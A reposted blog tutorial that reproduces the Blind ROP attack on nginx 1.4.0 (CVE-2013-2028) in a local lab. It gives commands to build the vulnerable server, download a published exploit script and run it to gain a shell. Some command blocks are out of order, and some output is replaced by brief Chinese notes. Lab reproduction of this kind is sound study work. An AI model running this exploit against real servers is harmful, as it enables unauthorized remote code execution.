转载于:http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/
Following the 1st session, which talked about the principle of BROP attack, this page will discuss about how to conduct the real exploit in a Linux system.
This session is more like a kind of tutorial about how I conduct one of the 3 attacks conducted by the authors (specifically, attack nginx 1.4.0 with a buffer overflow bug - CVE-2013-2028, and finally can execute the shell) in my PC.
Setting Up Nginx-1.4.0
At first, we need to setup the server environment: nginx 1.4.0.
Download the nginx 1.4.0 source code:
在configure之前完成
$ wget nginx.org/download/nginx-1.4.0.tar.gz
$ tar zxvf nginx-1.4.0.tar.gz
$ cd nginx-1.4.0
$ ./configure --sbin-path=/usr/local/nginx/nginx --conf-path=/usr/local/nginx/nginx.conf --pid-path=/usr/local/nginx/nginx.pid --with-http_ssl_module
Before compiling, modify the makefile with stack canary protection:
vim objs/Makefile
...
CFLAGS = -pipe -O -W -Wall -Wpointer-arith -Wno-unused-parameter -Werror -g -fstack-protector
...
Then compile it:
$ make -j4
$ sudo make install
At this point, it is installed in the
/usr/local/nginx
folder. If you use
checksec.sh
to check it:
$ wget www.trapkit.de/tools/checksec.sh
$ chmod +x ./checksec.sh
$ ./checksec.sh --file /usr/local/nginx/nginx
You will get following result:
RELRO现在变为partial RELRO
Which means it already has NX and Stack canary protection.
Before running nginx, we need to modify its configuration to make it run with 4 worker processes:
Exploit BROP Attack
Now let’s see how to do the BROP attack. It is quite simple, since the authors have already write a nginx specific attack script using ruby.
Download the exploit script:
$ vim /usr/local/nginx/nginx.conf
..
worker_processes 4;
..
$ sudo /usr/local/nginx/nginx
$ wget www.scs.stanford.edu/brop/nginx-1.4.0-exp.tgz
$ tar zxvf nginx-1.4.0-exp.tgz
$ cd nginx-1.4.0-exp
And run it by simply executing:
$ ./brop.rb 127.0.0.1
If everything is ok, then it will exploit the nginx-1.4.0 using the approach I talked about
here
, and finally print the id of the exploited shell’s owner
If there’s any problem, and you want to rerun the script, you should first remove the state.bin
file, or even restart nginx, and run brop.rb again:
$ rm -f ./state.bin
$ ./brop.rb 127.0.0.1
That’s done!